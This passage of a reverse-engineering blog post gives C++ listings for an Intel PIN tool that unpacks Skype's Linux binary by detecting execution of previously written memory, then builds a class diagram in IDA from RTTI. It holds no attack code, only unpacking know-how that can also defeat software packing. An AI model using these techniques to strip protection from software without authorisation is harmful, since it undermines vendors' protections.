</div>
</li>
<li class="li1">
<div class="de1">
seg.<span class="me1">size</span> <span class="sy0">=</span> SEC_Size<span class="br0">(</span>sec<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
seg.<span class="me1">check</span> <span class="sy0">=</span> check;
</div>
</li>
<li class="li1">
<div class="de1">
seg.<span class="me1">written</span> <span class="sy0">=</span> <span class="kw2">false</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// save the segment information</span>
</div>
</li>
<li class="li1">
<div class="de1">
seg_bytes<span class="br0">[</span>sec_ea<span class="br0">]</span> <span class="sy0">=</span> seg;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>We iterate over all the segments of the application that will be loaded into the process memory and save information about them. Now, in the “trace_cb” callback, we check, for every instruction of every basic block that is going to be executed, whether the code writes to memory within the bounds of the previously recorded segments or whether the process is about to execute an instruction in a previously written segment of the application:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">static</span> <span class="kw4">VOID</span> trace_cb<span class="br0">(</span>TRACE trace, <span class="kw4">VOID</span> <span class="sy0">*</span>v<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Visit every basic block in the trace</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span> <span class="br0">(</span> BBL bbl <span class="sy0">=</span> TRACE_BblHead<span class="br0">(</span>trace<span class="br0">)</span>; BBL_Valid<span class="br0">(</span>bbl<span class="br0">)</span>; bbl <span class="sy0">=</span> BBL_Next<span class="br0">(</span>bbl<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Visit every instruction in the basic block</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span><span class="br0">(</span> INS ins <span class="sy0">=</span> BBL_InsHead<span class="br0">(</span>bbl<span class="br0">)</span>; INS_Valid<span class="br0">(</span>ins<span class="br0">)</span>; ins<span class="sy0">=</span>INS_Next<span class="br0">(</span>ins<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// check if the address is in the limits of the application's segments</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT ea <span class="sy0">=</span> INS_Address<span class="br0">(</span>ins<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> <span class="sy0">!</span>valid_ea<span class="br0">(</span>ea<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">continue</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// if that address was already written and is going to be executed, we consider it's unpacked</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> was_writen<span class="br0">(</span>ea<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertCall<span class="br0">(</span>ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>check_unpacked_cb,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_INST_PTR,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_CONST_CONTEXT,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_THREAD_ID,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Instruments memory accesses using a predicated call, i.e.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// the instrumentation is called iff the instruction will actually be executed.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">//</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// The IA-64 architecture has explicitly predicated instructions. </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// On the IA-32 and Intel(R) 64 architectures conditional moves and REP </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// prefixed instructions appear as predicated instructions in Pin.</span>
</div>
</li>
<li class="li1">
<div class="de1">
UINT32 mem_operands <span class="sy0">=</span> INS_MemoryOperandCount<span class="br0">(</span>ins<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Iterate over each memory operand of the instruction.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span> <span class="br0">(</span> UINT32 mem_op <span class="sy0">=</span> <span class="nu0">0</span>; mem_op <span class="sy0">&lt;</span> mem_operands; mem_op<span class="sy0">++</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Note that in some architectures a single memory operand can be </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// both read and written (for instance incl (%eax) on IA-32)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// In that case we instrument it once for read and once for write.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> INS_MemoryOperandIsWritten<span class="br0">(</span>ins, mem_op<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// is the memory address to be modified in the limits of the application's segments?</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertIfPredicatedCall<span class="br0">(</span>ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>valid_ea,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_MEMORYOP_EA,
</div>
</li>
<li class="li1">
<div class="de1">
mem_op,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// if so, add our instrumentation code</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertThenPredicatedCall<span class="br0">(</span>
</div>
</li>
<li class="li1">
<div class="de1">
ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>record_mem_write_cb,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_INST_PTR,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_MEMORYOP_EA, mem_op,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
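<p>The “trace_cb” callback relies on two helpers, “valid_ea” and “was_writen”, that are not listed here. The following is only a minimal sketch of how they could look, not the code from pinpack.cpp: the typedef is a stand-in for Pin’s ADDRINT so that it builds without the Pin headers, and treating min_ea/max_ea as an inclusive range is an assumption. “valid_ea” returns an ADDRINT because Pin runs the “then” call only when the “if” routine returns a non-zero value.</p>

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <deque>

// Stand-in for Pin's ADDRINT so the sketch builds without the Pin headers.
typedef std::uintptr_t ADDRINT;
typedef std::deque<ADDRINT> addrdeq_t;

// Assumed globals: bounds of the recorded segments and the list of
// addresses written so far (names follow the listings in this post).
static ADDRINT min_ea = 0;
static ADDRINT max_ea = 0;
static addrdeq_t write_address;

// Non-zero when ea lies inside [min_ea, max_ea]. The ADDRINT return type
// matches what Pin expects from an "If" analysis routine.
ADDRINT valid_ea(ADDRINT ea)
{
  assert(min_ea <= max_ea);
  return ea >= min_ea && ea <= max_ea;
}

// True when ea is inside the tracked range and was the target of a
// previously recorded write.
bool was_writen(ADDRINT ea)
{
  return valid_ea(ea) != 0 &&
         std::find(write_address.begin(), write_address.end(), ea) != write_address.end();
}
```

<p>With min_ea and max_ea set to the bounds of the application and 0x805c050 pushed into write_address, was_writen(0x805c050) is true while any address that was never written yields false.</p>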
<p>In the “record_mem_write_cb” callback the PIN tool checks if the actual memory write affects any of the application’s segments. If so, the “written” flag of the corresponding segment element is set to true:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="co1">// Handle memory write records</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> record_mem_write_cb<span class="br0">(</span><span class="kw4">VOID</span> <span class="sy0">*</span> ip, <span class="kw4">VOID</span> <span class="sy0">*</span> addr<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT ea <span class="sy0">=</span> <span class="br0">(</span>ADDRINT<span class="br0">)</span>addr;
</div>
</li>
<li class="li1">
<div class="de1">
segmap_t<span class="sy0">::</span><span class="me2">iterator</span> p;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span> <span class="br0">(</span> p <span class="sy0">=</span> seg_bytes.<span class="me1">begin</span><span class="br0">(</span><span class="br0">)</span>; p <span class="sy0">!=</span> seg_bytes.<span class="me1">end</span><span class="br0">(</span><span class="br0">)</span> <span class="sy0">&amp;&amp;</span> <span class="sy0">!</span>p<span class="sy0">-&gt;</span>second.<span class="me1">written</span>; <span class="sy0">++</span>p <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT start_ea <span class="sy0">=</span> p<span class="sy0">-&gt;</span>first;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> ea <span class="sy0">&gt;=</span> start_ea <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
segdata_t <span class="sy0">*</span>seg <span class="sy0">=</span> <span class="sy0">&amp;</span>p<span class="sy0">-&gt;</span>second;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> ea <span class="sy0">&lt;</span> start_ea <span class="sy0">+</span> seg<span class="sy0">-&gt;</span>size <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
fprintf<span class="br0">(</span>stderr, <span class="st0">"%p: W %p<span class="es0">\n</span>"</span>, ip, addr<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
write_address.<span class="me1">push_back</span><span class="br0">(</span><span class="br0">(</span>ADDRINT<span class="br0">)</span>addr<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
seg<span class="sy0">-&gt;</span>written <span class="sy0">=</span> <span class="kw2">true</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw2">break</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
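<p>The callback above scans the segment map linearly. As a hedged alternative (it is not what pinpack.cpp does), the same “which segment contains this address?” question can be answered with std::map::upper_bound, since the map is keyed by the segment start address. The segdata_t layout below is assumed from the fields used in this post, and find_segment/mark_written are hypothetical names.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>

typedef std::uintptr_t ADDRINT;  // stand-in for Pin's ADDRINT

// Assumed layout, based on the fields used in the listings of this post.
struct segdata_t
{
  std::size_t size;
  ADDRINT check;
  bool written;
};
typedef std::map<ADDRINT, segdata_t> segmap_t;

// Return the segment whose half-open range [start, start + size) contains
// ea, or NULL when no recorded segment does.
segdata_t *find_segment(segmap_t &segs, ADDRINT ea)
{
  // upper_bound yields the first segment starting after ea, so the only
  // candidate is the entry just before it.
  segmap_t::iterator p = segs.upper_bound(ea);
  if ( p == segs.begin() )
    return NULL;
  --p;
  assert(p->first <= ea);
  return ea - p->first < p->second.size ? &p->second : NULL;
}

// Mark the segment containing ea as written; returns true if one was found.
bool mark_written(segmap_t &segs, ADDRINT ea)
{
  segdata_t *seg = find_segment(segs, ea);
  if ( seg == NULL )
    return false;
  seg->written = true;
  return true;
}
```

<p>Unlike the loop in the callback, this sketch does not skip segments that are already flagged. The range is half-open, so the first byte after the end of a segment does not count as part of it.</p>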
<p>And, finally, in the “check_unpacked_cb” callback that we installed in the “trace_cb” callback, we set the “written” member to false again and raise an application breakpoint that will be caught in IDA Pro:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> check_unpacked_cb<span class="br0">(</span><span class="kw4">VOID</span> <span class="sy0">*</span> ip, <span class="kw4">const</span> CONTEXT <span class="sy0">*</span>ctxt, THREADID tid<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT ea <span class="sy0">=</span> <span class="br0">(</span>ADDRINT<span class="br0">)</span>ip;
</div>
</li>
<li class="li1">
<div class="de1">
addrdeq_t<span class="sy0">::</span><span class="me2">iterator</span> it <span class="sy0">=</span> std<span class="sy0">::</span><span class="me2">find</span><span class="br0">(</span>write_address.<span class="me1">begin</span><span class="br0">(</span><span class="br0">)</span>, write_address.<span class="me1">end</span><span class="br0">(</span><span class="br0">)</span>, ea<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> it <span class="sy0">!=</span> write_address.<span class="me1">end</span><span class="br0">(</span><span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
write_address.<span class="me1">erase</span><span class="br0">(</span>it<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
fprintf<span class="br0">(</span>stderr, <span class="st0">"Layer unpacked: %p<span class="es0">\n</span>"</span>, ip<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
PIN_ApplicationBreakpoint<span class="br0">(</span>ctxt, tid, <span class="kw2">false</span>, <span class="st0">"Layer unpacked!"</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
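<p>To make the whole “write and exec” idea easier to follow, here is a small simulation without Pin. It is a sketch under my own assumptions: event_t and first_unpacked_ea are hypothetical names, and the events stand for what the two callbacks would observe at run time.</p>

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <deque>
#include <vector>

typedef std::uintptr_t ADDRINT;  // stand-in for Pin's ADDRINT

// One synthetic event: a memory write to ea, or the execution of ea.
struct event_t
{
  bool is_write;
  ADDRINT ea;
};

// Replay the events and return the first executed address that was written
// earlier, or 0 if no such address is seen.
ADDRINT first_unpacked_ea(const std::vector<event_t> &events)
{
  std::deque<ADDRINT> written;
  for ( std::size_t i = 0; i < events.size(); ++i )
  {
    const event_t &ev = events[i];
    assert(ev.ea != 0);  // 0 is reserved for "nothing found"
    if ( ev.is_write )
    {
      written.push_back(ev.ea);  // what record_mem_write_cb remembers
      continue;
    }
    // what check_unpacked_cb reacts to: executing a written address
    if ( std::find(written.begin(), written.end(), ev.ea) != written.end() )
      return ev.ea;
  }
  return 0;
}
```

<p>Feeding it writes to 0x840c35f, 0x805c050 and 0x8058ed0 followed by the execution of 0x805c050 returns 0x805c050, which is the point where the PIN tool would raise the breakpoint.</p>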
<p>OK, we have our simple unpacker. It’s time to compile it, run the PIN tool with the -appdebug command line switch, connect from IDA to PIN and let the application run. When the breakpoint is hit, the application (Skype in this case) is unpacked and we can take a memory snapshot. In the terminal where we ran the command we will see something like this:</p>
<p><code class="language-plaintext highlighter-rouge"><br />
$ ./pin -appdebug -t source/tools/MyPinTool/obj-ia32/pinpack.so -- /path/to/skype<br />
Application stopped until continued from debugger.<br />
Start GDB, then issue this command at the (gdb) prompt:<br />
target remote :47643<br />
0x83d95b9: W 0x840c35f<br />
0x840bc5e: W 0x805c050<br />
0x840bd3f: W 0x8058ed0<br />
Layer unpacked: 0x805c050<br />
</code></p>
<p>And in IDA we will receive an application breakpoint at the entry point with the message “Layer unpacked” displayed in the output window:</p>
<div id="attachment_2222" style="width: 841px" class="wp-caption aligncenter">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt.png"><img class="size-full wp-image-2222" title="Skype finally unpacked with the PIN tool &quot;pinpack&quot;" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt.png" alt="Skype finally unpacked with the PIN tool &quot;pinpack&quot;" width="831" height="839" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt.png 831w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt-150x150.png 150w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt-297x300.png 297w" sizes="(max-width: 831px) 100vw, 831px" /></a>
<p class="wp-caption-text">
Skype finally unpacked with the PIN tool “pinpack”
</p>
</div>
<p>And that’s all! We have a working “write and exec” unpacker in the form of a PIN tool. You can download the source code of the unpacker <a href="http://www.joxeankoret.com/download/pinpack.cpp">here</a>.</p>
<p><strong>Extra</strong></p>
<p>What I really wanted to do before writing the PIN tool was to get a class diagram of the Skype application. Now that the application is unpacked in IDA we can easily do it (after taking a memory snapshot and re-analysing the whole database). I’ll use the <a href="http://www.hexblog.com/wp-content/uploads/2012/06/recon-2012-skochinsky-scripts.zip">scripts</a> written by Igor Skochinsky and released after his <a href="http://recon.cx">RECON</a> talk <a href="http://www.hexblog.com/wp-content/uploads/2012/06/Recon-2012-Skochinsky-Compiler-Internals.pdf">“Compiler Internals: Exceptions and RTTI”</a>. I modified the script gnu_rtti.py a little to display a class diagram in a <a href="http://www.hexblog.com/?p=106">GraphViewer</a> component in IDA (instead of a chooser) that also lets you save the diagram in dot format. You can download my modified version of the script <a href="http://www.joxeankoret.com/download/gnu_rtti.py.gz">here</a>.</p>
<p>After running this script (go grab a coffee if you do it yourself, as it will take a while) the class diagram will be displayed in the GraphViewer component and we can right-click on the graph and select “Export to dot”. The following is the generated class diagram of Skype rendered with <a href="http://www.graphviz.org/">GraphViz</a>:</p>
<div style="width: 1008px" class="wp-caption aligncenter">
<a href="http://www.joxeankoret.com/img/skype.png"><img class=" " title="Skype class diagram rendered with GraphViz" src="http://www.joxeankoret.com/img/skype.png" alt="Skype class diagram rendered with GraphViz" width="998" height="1216" /></a>
<p class="wp-caption-text">
Skype class diagram
</p>
</div>
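<p>For readers who have never seen the dot format, this is roughly what such an export boils down to. The sketch below is an illustration only and says nothing about what the modified gnu_rtti.py actually writes: to_dot and edges_t are hypothetical names, and it simply emits one edge per (derived class, base class) pair.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <sstream>
#include <string>
#include <utility>
#include <vector>

// (derived class, base class) pairs, as one might recover them from RTTI.
typedef std::vector<std::pair<std::string, std::string> > edges_t;

// Build a DOT digraph with one edge per inheritance relation.
std::string to_dot(const edges_t &edges)
{
  std::ostringstream out;
  out << "digraph classes {\n";
  for ( std::size_t i = 0; i < edges.size(); ++i )
  {
    assert(!edges[i].first.empty() && !edges[i].second.empty());
    out << "  \"" << edges[i].first << "\" -> \"" << edges[i].second << "\";\n";
  }
  out << "}\n";
  return out.str();
}
```

<p>Saving the returned string to a file such as classes.dot and running “dot -Tpng classes.dot -o classes.png” renders it with GraphViz.</p>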
<p>That’s all! I hope you liked this blog post!</p>
joxean
Some time ago I wanted to take a look at Skype to see how it works and get the class diagram of this program but, surprise: it’s packed. The Windows version is protected with a crypter of their own (UPDATE: my original statement, that it was protected with Themida the last time I checked, was wrong; the application protected with Themida was Spotify). However, as I expected, the Linux version was simply packed (not protected) and with something easy to unpack. To unpack Skype and be able to analyse it in IDA and, also, to learn a bit about how Intel PIN works, I have written a PIN tool to “automatically” unpack Skype.